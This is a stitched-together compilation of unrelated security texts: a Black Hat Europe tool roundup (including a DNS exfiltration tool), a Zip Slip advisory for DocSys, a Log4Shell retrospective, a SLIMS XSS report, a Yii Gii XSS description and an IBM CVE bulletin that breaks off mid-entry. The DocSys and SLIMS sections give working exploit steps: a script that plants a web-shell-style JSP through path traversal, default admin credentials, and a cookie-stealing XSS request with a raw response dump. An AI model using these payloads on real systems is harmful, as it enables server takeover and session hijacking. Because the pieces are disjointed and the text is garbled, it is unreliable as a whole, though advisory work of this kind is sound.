Aids and techniques demonstrated at this year’s arsenal track

Aids and techniques demonstrated at this year’s arsenal track

  

Tools to enable the work of security researchers, pen testers, and bug bounty hunters were demonstrated at this year’s Black Hat Europe conference, held at London’s Excel Centre this week.

The annual security conference saw hackers from across the world gather to share research and other insights.

One of the conference’s regular features is the arsenal track, where attendees can witness live demos of various hacking tools.

**Node Security Shield**

One of the tools showcased this year, Node Security Shield, “provides zero-day protection for NodeJS applications”, Lavakumar Kuppan of Domsdog Security, which created the tool, told The Daily Swig.

“It is a defensive tool designed to be used by developers as well as security engineers,” they said.

“Existing defensive systems like WA \[web application firewall\], RASP or any of the supply chain attack protection systems all take a similar approach. They look for known bad patterns. This approach is fine for blocking well known attacks, but it is ineffective against zero-days.

“Node Security Shield takes the opposite approach. Application owners typically know and can define the expected behavior of their application. Node Security Shield ensures that only the defined good behavior is allowed, and any deviations are either blocked or trigger an alert.”

Node Security Shield supports a ‘Resource Access Policy’, inspired by Content Security Policy, a simple JavaScript object where the application owner defines the expected behavior of their app.

Read more of the latest news about hacking tools

“This enables us to block or provide exploitation mitigation against zero-day attacks. Also this approach is extremely fast compared to the other systems that have to compare every incoming request against an ever increasing list of attack patterns.

“With systems like WAF and RASP (runtime application self-protection) there is a risk of legitimate functionality being affected because it is unclear what those products will block and allow. That risk is significantly less with this approach since the application owners have a very clear understanding of what this tool will allow and what it will block.”

The tool was inspired by the Log4Shell vulnerability, a zero-day vulnerability in Log4j, a popular Java logging framework, which could lead to arbitrary code execution. Many application that relied on Log4j became vulnerable as a result of the problem.

“The fact that an application can just randomly make a network connection to a server that the developer’s never intended it to, bothered us a lot.

“So \[we\] set out to build a system where the application owners can define who their application can talk to and enforce it, thereby blocking the exploitation of zero-days like Log4Shell.”

The tool was developed as an internal project at Domdog Security to protect their own NodeJS applications, however the team said they are “aware of at least two other companies that are experimenting with it now”.

Kuppan added: “We are looking to add the ability to control file system access in the next release. Most user feedback has pointed towards wanting the ability to update the Resource Access Policy dynamically without requiring app restart. So that is also in the roadmap.”

**JavaScript obfuscation**

Also presenting at the show was Or Katz, who showed a tool designed to be able to detect JavaScript code as being obfuscated, detecting obfuscation by using structure-based signatures.

It detects JavaScript code before being rendered by the browser “which is more challenging as the obfuscation tool will create different variations of the same malicious JavaScript each time \[it is\] being obfuscated”, Katz told The Daily Swig ahead of his presentation JavaScript Obfuscation – It’s All About the P-a-c-k-e-r-s.

“Using this static code detection approach has \[meant it has\] better performance compared to techniques that require rendering of the page.

The tool also exposes a set of features collected from JavaScript code that enables more detection and classification capabilities.

Katz added: “We have future thoughts on adding more capabilities for more coverage on obfuscation tools, using collecting features for training of machine learning modules that will enable classification of malicious versus benign code.”

**Invoke-DNSteal**

A third tool, Invoke-DNSteal, allows users to perform file transfers using the DNS protocol as a covert communications channel, its creator Joel Gamez told The Daily Swig.

Although it has been designed primarily for pen testers, bug bounty hunters could also use it in “very restricted environments, in order to exfiltrate information from a compromised computer”, Gamez noted.

“Unlike other DNS data exfiltration tools, Invoke-DNSteal stands out for two main features:

The first, is that it does not use any type of library nor does it depend on third parties to work.

“For the server side, it only uses Python and sockets, so any device (however limited) that can run Python can run the server.

“For the victim (or client, if you prefer) side, native PowerShell queries will be used to send information via DNS, thus bypassing many anti-virus and EDR solutions.”

Also unlike other tools, says Gamez, Invoke-DNSteal focuses on the resolver and not the DNS domain.

“All DNS exfiltration tools need a domain to send information to. To do so, they will need to resolve that request using any DNS resolver.

“In the case of Invoke-DNSteal, we focus on using a resolver (or a list of them) controlled by the attacker, which will resolve any domain, even if it does not exist.

“In this way, it is possible to send information to random domains that do not exist, thus circumventing most DNS anti-spoofing solutions on the market.”

Users are also able to control the size and sending time of the payloads, which will also help them to evade protections.

“I decided to create this tool because I did not find any that solved this problem, or that used this technique of using random domains that do not exist to perform these bypasses,” Gamez said.

“In the next versions we will add a sequence control (remember that UDP \[User Datagram Protocol\] does not exist by default), payload encryption by default, a client for Linux and some improvements in payload compression, among many other things.”

YOU MAY ALSO LIKE Black Hat Europe 2022: A defendable internet is possible, but only with industry makeover

Black Hat Europe 2022: Hacking tools showcased at annual security conference

A vulnerability classified as critical has been found in RainyGao DocSys 2.02.37. This affects an unknown part of the component ZIP File Decompression Handler. The manipulation leads to path traversal: '../filedir'. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-215271.

**Instructions in English****Description**

There is a Zip Slip vulnerability in the MxsDoc(DocSys) application that can cause malicious jsp files to be uploaded. The vulnerability is located in the BaseController.java file, where the unZip method did not Check "... /". This vulnerability can also be triggered by the upgradeSystem method of the ManageController.java file. Writes a malicious jsp file to the web directory.

**Impact**

1.  Affected version: less than or equal to DocSys\_V2.02.37(latest version)
2.  Condition of utilization：The administrator or super administrator rights are required
3.  Impact：A zip slip vulnerability in this system can result in getshell

**Code Audit**

In com.DocSystem.Controller.BaseController#unZip method exists in the following code snippet:  

The value of entry.getName() is controllable. Inject ".. /", you can write the malicious jsp file to the web root.

Looking for a trigger point, found in com.DocSystem.Controller.ManageController#upgradeSystem method triggers the com.DocSystem.Controller.BaseController#unZip method.  
The key code is as follows:  

**Steps to reproduce****Application Installation**

This system is available on both github and gitee, but there is a war package on github for easy deployment. The download address is as follows: https://github.com/RainyGao-GitHub/DocSys/releases  

After downloading DocSystem.war, unzip it, store it in the tomcat webapps directory, and modify the database configuration file jdbc.properties:

    db.type=mysql
    db.driver=com.mysql.cj.jdbc.Driver
    db.url=jdbc:mysql://localhost:3306/DocSystem1?useUnicode=true&characterEncoding=UTF-8&serverTimezone=UTC
    db.username=root
    db.password=root
    

After the success of the start tomcat, visit http://localhost:8080/DocSystem/web/index.html  
During application initialization, you need to create a system administrator: admin/admin123

**Create malicious compressed files**

tgao.jsp file contents:

    <html>
    <body>
    	<%
            out.println("zip slip getshell.");
        %>
    </body>
    </html>
    

Write a python script to compress the jsp file contents into DocSystem.war and specify the name as ../../DocSystem/tgao.jsp, which corresponds to entry.getName() in the source code.

    import zipfile
    
    if __name__ == "__main__":
        try:
            zipFile = zipfile.ZipFile("DocSystem.war", "a", zipfile.ZIP_DEFLATED)  ##生成的zip文件
            info = zipfile.ZipInfo("DocSystem.war")
            zipFile.write("D:/tgao/pass/tgao.jsp", "../../DocSystem/tgao.jsp", zipfile.ZIP_DEFLATED)  ##压缩的文件和在zip中显示的文件名
            zipFile.close()
        except IOError as e:
            raise e
    

Run the python script to generate the DocSystem.war file

**Exploitation of vulnerabilities**

After using the admin/admin123 login system，go to http://localhost:8080/DocSystem/manager/main.html  
  
Click the Upgrade button and upload the malicious compressed file DocSystem.war  
  
Click the Confirm button，Visit: http://localhost:8080/DocSystem/tgao.jsp  
  
The tgao.jsp file was successfully written.

**Bug Repair Suggestions**

Check whether the contents returned by entry.getName() exist "../" and intercept

**中文说明****漏洞描述**

MxsDoc(DocSys)中存在一个Zip Slip漏洞，可导致上传恶意jsp文件。漏洞位于BaseController.java文件，其中unZip方法解压文件时未对../ 进行检测，导致Zip Slip漏洞存在，另外可通过ManageController.java文件的upgradeSystem方法触发此漏洞。可导致像web目录写入恶意jsp文件。

**漏洞影响**

影响版本：小于等于DocSys\_V2.02.37(最新版本)  
利用条件：需要管理员权限登录  
危害：此系统的zip slip可导致getshell

**漏洞发现**

在com.DocSystem.controller.BaseController#unZip方法中存在如下代码片段  
  
其中entry.getName()的值是可控的，通过../可以将恶意jsp文件写到web根目录。  
寻找触发点，发现在com.DocSystem.controller.ManageController#upgradeSystem方法中触发了com.DocSystem.controller.BaseController#unZip方法  
关键代码如下：  

**漏洞复现****制作恶意压缩包**

tgao.jsp文件内容：

    <html>
    <body>
    	<%
            out.println("zip slip getshell.");
        %>
    </body>
    </html>
    

编写python脚本将jsp文件内容内容压缩至DocSystem.war中，并指定name为../../DocSystem/tgao.jsp，此值对应源码中的entry.getName()内容

    import zipfile
    
    if __name__ == "__main__":
        try:
            zipFile = zipfile.ZipFile("DocSystem.war", "a", zipfile.ZIP_DEFLATED)  ##生成的zip文件
            info = zipfile.ZipInfo("DocSystem.war")
            zipFile.write("D:/tgao/pass/tgao.jsp", "../../DocSystem/tgao.jsp", zipfile.ZIP_DEFLATED)  ##压缩的文件和在zip中显示的文件名
            zipFile.close()
        except IOError as e:
            raise e
    

运行之后生成DocSystem.war文件

**漏洞利用**

使用admin/admin123登录系统后访问：  
http://localhost:8080/DocSystem/manager/main.html  
  
点击系统升级，上传制作完成的恶意压缩文件DocSystem.war  
  
点击确认即可.  
访问：http://localhost:8080/DocSystem/tgao.jsp  
  
tgao.jsp成功被写入。

**修复建议**

检查entry.getName()是否存在../并拦截

CVE-2022-4402: 【缺陷】Zip Slip vulnerability · Issue #I65IYU · Rainy/DocSys - Gitee.com

Despite mitigation, one of the worst bugs in internet history is still prevalent—and being exploited.

Apache had to scramble at the beginning of December 2021 to be ready to release patches for Log4Shell when it publicly disclosed the situation on December 9 of last year. As a result, researchers quickly found edge cases and workarounds to the patches, and Apache was forced to release multiple iterations, which added to the confusion. 

“This thing was everywhere, truly everywhere,” says Jonathan Leitschuh, an open source security researcher. “Attackers were jumping on it, the security community was jumping on it, payloads were flying everywhere.”

Researchers say, though, that Apache's overall response was solid. Nalley adds that Apache has made changes and improvements in reaction to the Log4Shell saga and hired dedicated staff to expand the security support it can offer to open-source projects to catch bugs before they ship in code and respond to incidents when necessary.

“In a short period of time, two weeks, we had fixes out, which is great,” Nalley says. “In some ways, this is not a new situation to us, and I would love to say we dealt with it perfectly. But the reality is, even at the Apache Software Foundation, this highlighted what a responsibility we have to everyone who consumes our software.” 

Going forward, the more concerning aspect of the situation is that, even a year later, roughly a quarter or more of the Log4j downloads from the Apache repository Maven Central and other repository servers are still full of vulnerable versions of Log4j. In other words, software developers are still actively maintaining systems running vulnerable versions of the utility or even building new software that is vulnerable.

"The reality is that the majority of the time when people are choosing a vulnerable open-source software component, there's already a fix available,” says Brian Fox, cofounder and chief technology officer of the software supply-chain firm Sonatype, which operates Maven Central and is also a third-party Apache repository provider. “I've been around for a long time, and I'm jaded, but that really is shocking. And the only explanation is that people really do not understand what’s inside their software.”

Fox says that after the initial scramble to address Log4Shell, version downloads in Maven Central and other repositories hit a shelf where roughly 60 percent of the downloads were of patched versions and 40 percent were still of vulnerable versions. Over the last three months or so, Fox and Apache's Nalley say they've seen the numbers fall for the first time to roughly a 75/25 percent split. As Fox puts it, though, “After a year, a quarter of the downloads is still pretty terrible."

“Some people feel Log4j was a big wake-up to the industry, a collective freak-out and awakening,” he says. “And it has helped us really expand upon the message about software supply-chain security, because no longer were people in denial. The thing we were all talking about was real now' we were all living it. But the peer pressure alone of Log4j should have forced everyone to upgrade, so if we can’t get this one to 100 percent, what about all the other ones?”

For security researchers, the question of how to address the long tail of a vulnerability is always present. And the issue applies not just to open-source software, but proprietary systems as well. Just think about how many years it took to move the last 10 percent of Windows users off of XP.

“With these worst-case scenarios—black swan events in open source—you just know they're going to keep happening, because the community has gotten a lot better at reacting, but the pace of open-source development is even faster,” ChainGuard's Lorenc says. “So we have to find the balance of prevention and mitigation, and keep coming up with efforts to reduce the frequency as much as possible. It's like _The Simpsons_ meme when Bart says, ‘This is the worst day of my life.’ And Homer says no, ‘The worst day of your life _so far_.’”

Log4j’s Log4Shell Vulnerability: One Year Later, It’s Still Lurking

Senayan Library Management System version 9.4.0 suffers from a cross site scripting vulnerability.

## Title: Senayan Library Management System v9.4.0 a.k.a SLIMS 9XSS-Reflected- PHPSESSID Hijacking## Author: nu11secur1ty## Date: 12.08.2022## Vendor: https://slims.web.id/web/## Software: https://slims.web.id/web/news/rilis-9.4.0/## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.4.0## Description:The value of the `destination` request parameter is copied into thevalue of an HTML tag attribute which is encapsulated in doublequotation marks.The payload zbuip"><script>alert(hello_vulnerability)</script>jgoihbmmyglwas submitted in the destination parameter.This input was echoed unmodified in the application's response. Theattacker can hijack the session of some users of the system.## STATUS: HIGH Vulnerability[+] Payload:```GETGET /slims9_bulian-9.4.0/index.php?p=member&destination=zbuip%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3ejgoihbmmygl&memberID=admin&memberPassWord=password&_csrf_token_645a83a41868941e4692aa31e7235f2=6a50886006f02202a6dac5cfa07bcbfb1e2a6e84&logMeIn=LoginHTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Cookie: SenayanMember=82qkie4ai1alsk0gtbge7rc48mOrigin: http://pwnedhost.comUpgrade-Insecure-Requests: 1Referer: http://pwnedhost.com/slims9_bulian-9.4.0/index.php?p=memberSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```[+] Response:```HTTP/1HTTP/1.1 200 OKDate: Thu, 08 Dec 2022 18:43:20 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Frame-Options: SAMEORIGINX-Powered-By: PHP/7.4.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheX-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 30590<!DOCTYPE html><html><head>    <meta charset="utf-8">    <title>Open Source Library Management System | Senayan</title>    <meta name="viewport" content="width=device-width,initial-scale=1, shrink-to-fit=no">    <meta http-equiv="X-UA-Compatible" content="IE=edge">    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>    <meta http-equiv="Pragma" content="no-cache"/>    <meta http-equiv="Cache-Control" content="no-store, no-cache,must-revalidate, post-check=0, pre-check=0"/>    <meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT"/>    <meta name="robots" content="noindex, follow">        <metaname="description" content="Open Source Library Management System |Senayan">      <meta name="keywords" content="Open Source Library Management System">      <meta name="viewport" content="width=device-width,height=device-height, initial-scale=1">    <meta name="generator" content="SLiMS 9 (Bulian)">    <meta name="theme-color" content="#000">    <meta property="og:locale" content="en_US"/>    <meta property="og:type" content="book"/>    <meta property="og:title" content="Open Source Library ManagementSystem | Senayan"/>        <meta property="og:description" content="Open Source LibraryManagement System"/>      <meta property="og:url"content="//pwnedhost.com%2Fslims9_bulian-9.4.0%2Findex.php%3Fp%3Dmember%26destination%3Dzbuip%22%3Ealert%28document.cookie%29jgoihbmmygl%26memberID%3Dadmin%26memberPassWord%3Dpassword%26_csrf_token_645a83a41868941e4692aa31e7235f2%3D6a50886006f02202a6dac5cfa07bcbfb1e2a6e84%26logMeIn%3DLogin"/>    <meta property="og:site_name" content="Senayan"/>        <meta property="og:image"            content="//pwnedhost.com/slims9_bulian-9.4.0/template/default/img/logo.png"/>    <meta name="twitter:card" content="summary">    <meta name="twitter:url"content="//pwnedhost.com%2Fslims9_bulian-9.4.0%2Findex.php%3Fp%3Dmember%26destination%3Dzbuip%22%3Ealert%28document.cookie%29jgoihbmmygl%26memberID%3Dadmin%26memberPassWord%3Dpassword%26_csrf_token_645a83a41868941e4692aa31e7235f2%3D6a50886006f02202a6dac5cfa07bcbfb1e2a6e84%26logMeIn%3DLogin"/>    <meta name="twitter:title" content="Open Source Library ManagementSystem | Senayan"/>        <meta property="twitter:image"            content="//pwnedhost.com/slims9_bulian-9.4.0/template/default/img/logo.png"/>          <link rel="stylesheet" href="template/default/assets/css/bootstrap.min.css">        <link rel="stylesheet"href="template/default/assets/plugin/font-awesome/css/fontawesome-all.min.css">        <link rel="stylesheet" href="template/default/assets/css/tailwind.min.css">        <link rel="stylesheet"href="template/default/assets/plugin/vegas/vegas.min.css">    <link href="/slims9_bulian-9.4.0/js/toastr/toastr.min.css?31014320"rel="stylesheet" type="text/css"/>        <link rel="stylesheet" href="/slims9_bulian-9.4.0/js/colorbox/colorbox.css">        <link rel="stylesheet" href="template/default/assets/css/flag-icon.min.css">        <link rel="stylesheet"href="template/default/assets/css/style.css?v=20221209-014320">    <link rel="shortcut icon" href="webicon.ico" type="image/x-icon"/>        <script src="template/default/assets/js/vue.min.js"></script>        <script src="template/default/assets/js/jquery.min.js"></script>        <script src="template/default/assets/js/popper.min.js"></script>        <script src="template/default/assets/js/bootstrap.min.js"></script>        <script src="template/default/assets/plugin/vegas/vegas.min.js"></script>    <script src="/slims9_bulian-9.4.0/js/toastr/toastr.min.js"></script>        <script src="/slims9_bulian-9.4.0/js/colorbox/jquery.colorbox-min.js"></script>    <script src="/slims9_bulian-9.4.0/js/gui.js"></script>    <script src="/slims9_bulian-9.4.0/js/fancywebsocket.js"></script></head><body class="bg-grey-lightest">    <div class="result-search page-member-area">        <section id="section1 container-fluid">            <header class="c-header">                <div class="mask"></div><nav class="navbar navbar-expand-lg navbar-dark bg-transparent">    <a class="navbar-brand inline-flex items-center" href="index.php">                <svg            class="fill-current text-white inline-block h-8 w-8"            version="1.1"            xmlns="http://www.w3.org/2000/svg"xmlns:xlink="http://www.w3.org/1999/xlink"            viewBox="0 0 118.4 135" style="enable-background:new 0 0 118.4 135;"            xml:space="preserve">                <pathd="M118.3,98.3l0-62.3l0-0.2c-0.1-1.6-1-3-2.3-3.9c-0.1,0-0.1-0.1-0.2-0.1L61.9,0.8c-1.7-1-3.9-1-5.4-0.1l-54,31.1l-0.4,0.2C0.9,33,0.1,34.4,0,36c0,0.1,0,0.2,0,0.3l0,62.4l0,0.3c0.1,1.6,1,3,2.3,3.9c0.1,0.1,0.2,0.1,0.2,0.2l53.9,31.1l0.3,0.2c0.8,0.4,1.6,0.6,2.4,0.6c0.8,0,1.5-0.2,2.2-0.5l53.9-31.1c0.3-0.1,0.6-0.3,0.9-0.5c1.2-0.9,2-2.3,2.1-3.7c0-0.1,0-0.3,0-0.4                C118.4,98.6,118.3,98.5,118.3,98.3zM114.4,98.8c0,0.3-0.2,0.7-0.5,0.9c-0.1,0.1-0.2,0.1-0.2,0.1l-20.6,11.9L59.2,92.1l-33.9,19.6L4.6,99.7l0,0l0,0C4.2,99.5,4,99.2,4,98.8l0-62.5l0,0l0-0.1c0-0.4,0.2-0.7,0.5-0.9l20.8-12l33.9,19.6l33.9-19.6l20.6,11.9l0.1,0                c0.3,0.2,0.5,0.5,0.6,0.9l0,62.3L114.4,98.8L114.4,98.8zM95.3,68.6v39.4L23.1,66.4V26.9L95.3,68.6z"/>         </svg>                <div class="inline-flex flex-col leading-tight ml-2">            <h1 class="text-lg m-0 p-0">Senayan</h1>                    </div>    </a>    <button class="navbar-toggler" type="button"data-toggle="collapse" data-target="#navbarSupportedContent"            aria-controls="navbarSupportedContent"aria-expanded="false" aria-label="Toggle navigation">        <span class="navbar-toggler-icon"></span>    </button>    <div class="collapse navbar-collapse" id="navbarSupportedContent">        <ul class="navbar-nav ml-auto">          <li class="nav-item ">    <a class="nav-link" href="index.php">Home</a></li><li class="nav-item ">    <a class="nav-link" href="index.php?p=libinfo">Information</a></li><li class="nav-item ">    <a class="nav-link" href="index.php?p=news">News</a></li><li class="nav-item ">    <a class="nav-link" href="index.php?p=help">Help</a></li><li class="nav-item ">    <a class="nav-link" href="index.php?p=librarian">Librarian</a></li>                        <li class="nav-item active">                  <a class="nav-link" href="index.php?p=member">Member Area</a>              </li>                      <li class="nav-item dropdown">                              <a class="nav-link dropdown-togglecursor-pointer" type="button" id="languageMenuButton"                   data-toggle="dropdown" aria-haspopup="true"aria-expanded="false">                    <span class="flag-icon flag-icon-us"style="border-radius: 2px;"></span>                </a>                <div class="dropdown-menu bg-grey-lighterdropdown-menu-lg-right" aria-labelledby="dropdownMenuButton">                    <h6 class="dropdown-header">Select Language : </h6>                      <a class="dropdown-item"href="index.php?select_lang=ar_SA">        <span class="flag-icon flag-icon-sa mr-2"style="border-radius: 2px;"></span> Arabic    </a>    <a class="dropdown-item" href="index.php?select_lang=bn_BD">        <span class="flag-icon flag-icon-bd mr-2"style="border-radius: 2px;"></span> Bengali    </a>    <a class="dropdown-item" href="index.php?select_lang=pt_BR">        <span class="flag-icon flag-icon-br mr-2"style="border-radius: 2px;"></span> Brazilian Portuguese    </a>    <a class="dropdown-item" href="index.php?select_lang=en_US">        <span class="flag-icon flag-icon-us mr-2"style="border-radius: 2px;"></span> English    </a>    <a class="dropdown-item" href="index.php?select_lang=es_ES">        <span class="flag-icon flag-icon-es mr-2"style="border-radius: 2px;"></span> Espanol    </a>    <a class="dropdown-item" href="index.php?select_lang=de_DE">        <span class="flag-icon flag-icon-de mr-2"style="border-radius: 2px;"></span> German    </a>    <a class="dropdown-item" href="index.php?select_lang=id_ID">        <span class="flag-icon flag-icon-id mr-2"style="border-radius: 2px;"></span> Indonesian    </a>    <a class="dropdown-item" href="index.php?select_lang=ja_JP">        <span class="flag-icon flag-icon-jp mr-2"style="border-radius: 2px;"></span> Japanese    </a>    <a class="dropdown-item" href="index.php?select_lang=my_MY">        <span class="flag-icon flag-icon-my mr-2"style="border-radius: 2px;"></span> Malay    </a>    <a class="dropdown-item" href="index.php?select_lang=fa_IR">        <span class="flag-icon flag-icon-ir mr-2"style="border-radius: 2px;"></span> Persian    </a>    <a class="dropdown-item" href="index.php?select_lang=ru_RU">        <span class="flag-icon flag-icon-ru mr-2"style="border-radius: 2px;"></span> Russian    </a>    <a class="dropdown-item" href="index.php?select_lang=th_TH">        <span class="flag-icon flag-icon-th mr-2"style="border-radius: 2px;"></span> Thai    </a>    <a class="dropdown-item" href="index.php?select_lang=tr_TR">        <span class="flag-icon flag-icon-tr mr-2"style="border-radius: 2px;"></span> Turkish    </a>    <a class="dropdown-item" href="index.php?select_lang=ur_PK">        <span class="flag-icon flag-icon-pk mr-2"style="border-radius: 2px;"></span> Urdu    </a>                </div>            </li>        </ul>    </div></nav>            </header>          <div class="search" id="search-wraper"xmlns:v-bind="http://www.w3.org/1999/xhtml">    <div class="container">        <div class="row">            <div class="col-lg-8 mx-auto">                <div class="card border-0 shadow">                    <div class="card-body">                        <form class="" action="index.php" method="get"@submit.prevent="searchSubmit">                            <input type="hidden" name="search" value="search">                            <input ref="keywords" value=""v-model.trim="keywords"                                   @focus="searchOnFocus"@blur="searchOnBlur" type="text" id="search-input"                                   name="keywords"class="input-transparent w-100" autocomplete="off"                                   placeholder="Enter keyword tosearch collection..."/>                        </form>                    </div>                </div>                <transition name="slide-fade">                    <div v-if="show" class="advanced-wraper shadowmt-4" id="advanced-wraper"                         v-click-outside="hideSearch">                        <p class="label mb-2">                            Search by :                            <i@click="hideSearch"                               class="far fa-times-circle float-righttext-danger cursor-pointer"></i>                        </p>                        <div class="d-flex flex-wrap">                            <a v-bind:class="{'btn-primarytext-white': searchBy === 'keywords', 'btn-outline-secondary':searchBy !== 'keywords' }"                               @click="searchOnClick('keywords')"class="btn mr-2 mb-2">ALL</a>                            <a v-bind:class="{'btn-primarytext-white': searchBy === 'author', 'btn-outline-secondary': searchBy!== 'author' }"                               @click="searchOnClick('author')"class="btn mr-2 mb-2">Author</a>                            <a v-bind:class="{'btn-primarytext-white': searchBy === 'subject', 'btn-outline-secondary': searchBy!== 'subject' }"                               @click="searchOnClick('subject')"class="btn mr-2 mb-2">Subject</a>                            <a v-bind:class="{'btn-primarytext-white': searchBy === 'isbn', 'btn-outline-secondary': searchBy!== 'isbn' }"                               @click="searchOnClick('isbn')"class="btn mr-2 mb-2">ISBN/ISSN</a>                            <button class="btn btn-light mr-2 mb-2"disabled>OR TRY</button>                            <a class="btn btn-outline-primary mr-2mb-2" data-toggle="modal" data-target="#adv-modal">Advanced Search</a>                        </div>                        <p v-if="lastKeywords.length > 0" class="labelmt-4">Last search:</p>                        <a:href="`index.php?${tmpObj[k].searchBy}=${tmpObj[k].text}&search=search`"                           class="flex items-center justify-betweenpy-1 text-decoration-none text-grey-darkest hover:text-blue"                           v-for="k in lastKeywords" :key="k"><span><i                                        class="far fa-clocktext-grey-dark mr-2"></i><span class="italictext-sm">{{tmpObj[k].text}}</span></span><i                                    class="fas fa-angle-righttext-grey-dark"></i></a>                    </div>                </transition>            </div>        </div>    </div></div>        </section>        <div class="container py-4">          <div class="row">              <div class="col-md-8">                    <div>        <div class="tagline">Library Member Login</div>                <div class="loginInfo">Please insert your member IDand password given by library system administrator. If you arelibrary's member and don't have a password yet, please contact librarystaff.</div>        <div class="loginInfo">            <formaction="index.php?p=member&destination=zbuip"><script>alert(document.cookie)</script>jgoihbmmygl"method="post">                <div class="fieldLabel">Member ID</div>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.4.0)## Proof and Exploit:[href](https://streamable.com/dsl863)## Time spent`01:30:00`

Senayan Library Management System 9.4.0 Cross Site Scripting

Yii Yii2 Gii through 2.2.4 allows stored XSS by injecting a payload into any field.

\[Suggested description\]

Yii Yii2 Gii through 2.2.4 allows stored XSS by injecting a payload into any field.

\------------------------------------------

\[Vulnerability Type\]

Cross Site Scripting (XSS)

\------------------------------------------

\[Vendor of Product\]

Yii Software

\------------------------------------------

\[Affected Product Code Base\]

Gii - <=2.2.4

\------------------------------------------

\[Affected Component\]

affected web application page

\------------------------------------------

\[Attack Type\]

Remote

\------------------------------------------

\[Impact Denial of Service\]

true

\------------------------------------------

\[Impact Escalation of Privileges\]

true

\------------------------------------------

\[Attack Vectors\]

Some fields like Message Category (requires I18N enabled) in Model Generator, CRUD Generator or Form Generator, Author Name in Extension Generator, etc. are being cached without sanitisation of their contents when the Preview button is pressed. This leads to possibility of injecting malicious javascript in specified pages by placing it in said fields and caching it by pressing Preview button. On each consequent visit of specified pages malicious javascript will be loaded from server and executed in client's browser.

\------------------------------------------

\[Reference\]

https://github.com/yiisoft/yii2-gii

https://www.yiiframework.com/doc/guide/2.0/en/start-gii

\------------------------------------------

\[Discoverer\]

Boris Kovalkov, security researcher at SolidLab Ltd.

CVE-2022-34297: CVE-2022-34297

IBM Cloud Transformation Advisor 2.0.1 through 3.3.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 237214.

  

**Summary**

IBM Cloud Transformation Advisor has addressed multiple security vulnerabilities including those in Node.js, IBM WebSphere Application Server Liberty and various other libraries.

**Vulnerability Details**

**CVEID:**   CVE-2022-24839  
**DESCRIPTION:**   Sparkle Motion Nokogiri is vulnerable to a denial of service, caused by a java.lang.OutOfMemoryError exception when parsing ill-formed HTML markup in the fork of org.cyberneko.html. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/224089 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2022-41299  
**DESCRIPTION:**   IBM Cloud Transformation Advisor is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.  
CVSS Base score: 3.9  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/237214 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N)

**CVEID:**   CVE-2022-21541  
**DESCRIPTION:**   An unspecified vulnerability in Java SE related to the VM component could allow an unauthenticated attacker to cause no confidentiality impact, high integrity impact, and no availability impact.  
CVSS Base score: 5.9  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/231568 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N)

**CVEID:**   CVE-2022-21540  
**DESCRIPTION:**   An unspecified vulnerability in Java SE related to the VM component could allow an unauthenticated attacker to obtain sensitive information resulting in a low confidentiality impact using unknown attack vectors.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/231567 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)

**CVEID:**   CVE-2022-25857  
**DESCRIPTION:**   Java package org.yaml:snakeyam is vulnerable to a denial of service, caused by missing to nested depth limitation for collections. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause a denial of service.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/234864 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2022-38751  
**DESCRIPTION:**   SnakeYAML is vulnerable to a denial of service, caused by a stack-overflow in parsing YAML files. By persuading a victim to open a specially crafted file, a remote attacker could exploit this vulnerability to cause the application to crash.  
CVSS Base score: 3.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/235311 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L)

**CVEID:**   CVE-2022-38749  
**DESCRIPTION:**   SnakeYAML is vulnerable to a denial of service, caused by a stack-overflow in parsing YAML files. By persuading a victim to open a specially crafted file, a remote attacker could exploit this vulnerability to cause the application to crash.  
CVSS Base score: 3.3  
